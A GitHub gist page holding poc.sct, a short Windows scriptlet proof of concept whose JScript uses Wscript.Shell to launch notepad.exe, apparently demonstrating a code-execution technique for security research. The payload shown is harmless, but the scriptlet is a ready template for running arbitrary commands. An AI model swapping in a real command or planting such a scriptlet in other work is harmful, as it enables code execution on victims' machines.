Skip to content

Instantly share code, notes, and snippets.

@matthiaskaiser
Created June 15, 2018 09:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save matthiaskaiser/179836e550edc1cacbb993f3de006632 to your computer and use it in GitHub Desktop.
Save matthiaskaiser/179836e550edc1cacbb993f3de006632 to your computer and use it in GitHub Desktop.
poc.sct
<?xml version='1.0'?>
<package>
<component id='giffile'>
<registration
description='Dummy'
progid='giffile'
version='1.00'
remotable='True'>
</registration>
<script language='JScript'>
<![CDATA[
new ActiveXObject('Wscript.Shell').exec('notepad.exe');
]]>
</script>
</component>
</package>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment